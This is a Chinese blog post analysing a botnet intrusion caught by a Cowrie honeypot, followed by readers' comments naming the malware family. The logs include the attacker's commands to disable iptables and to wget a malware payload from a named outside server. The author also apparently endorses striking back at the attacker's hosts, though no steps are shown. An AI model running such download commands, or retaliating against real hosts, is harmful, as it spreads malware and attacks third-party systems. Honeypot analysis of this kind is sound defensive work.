我被攻击了 蜜罐捕获
蜜罐捕获僵尸网络程序,让黑阔尝一尝僵尸网络是什么滋味
w3bsafe35 2020-01-14 13:46:54 784人浏览

起因,蜜罐捕获一僵尸网络程序。日志如下

{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.529345Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.client.size","width":80,"height":24,"message":"Terminal Size: 80 24","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.760927Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.923410Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.command.input","input":"/etc/init.d/iptables stop","message":"CMD: /etc/init.d/iptables stop","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.979618Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.command.failed","input":"/etc/init.d/iptables stop","message":"Command not found: /etc/init.d/iptables stop","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.980430Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.command.input","input":"wget http://123.56.244.178:8080/LinuxTF","message":"CMD: wget http://123.56.244.178:8080/LinuxTF","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:41.968671Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105","size":3557,"shasum":"5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105","duplicate":true,"duration":42.07410550117493,"message":"Closing TTY Log: var/lib/cowrie/tty/5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105 after 42 seconds","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:59:19.967740Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.session.closed","duration":57.2117645740509,"message":"Connection lost after 57 seconds","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:59:19.969413Z","src_ip":"112.30.132.7","session":"3ee826127229"}

image.png

拖入IDA分析出僵尸网络主机域名

image.png

songjing.123net.com ip 123.56.244.178 阿里云

image.png

image.png

8080端口为僵尸网络下载的服务器 HFS D阔们的基本操作

再来分析一下日志

{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105","size":3557,"shasum":"5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105","duplicate":true,"duration":42.07410550117493,"message":"Closing TTY Log: var/lib/cowrie/tty/5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105 after 42 seconds","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:59:19.967740Z","src_ip":"112.30.132.7","session":"3ee826127229"}

112.30.132.7 为僵尸网络扫描爆破上传抓鸡用的主机

以毒攻毒,防止公网上其他机器受害

image.png

ip地址(2) 威胁情报数目 开放端口 所属域名 相关样本 微步标签 < 1/1 >
域名(1) 威胁情报数目 子域名 历史指向ip 相关样本 微步标签 < 1/1 >
匿名用户 2020-01-17 20:34:56 回复
可以 可以
匿名用户 2020-01-15 10:36:05 回复
天罚dos,国内小黑客用的多
1行 2020-01-14 15:49:54 回复
看样子是国内的主控端,天罚的
匿名用户 2020-01-14 14:29:41 回复
123nat.com哈哈, 123net莫名躺枪
w3bsafe35 2020-01-14 15:21:16 回复
笔误,没有搞错。搞错就不止尴尬了
匿名用户 2020-01-14 14:23:25 回复
这个域名写错了噻
w3bsafe35 2020-01-14 15:20:21 回复
尴尬
奖励计划banner
今日推荐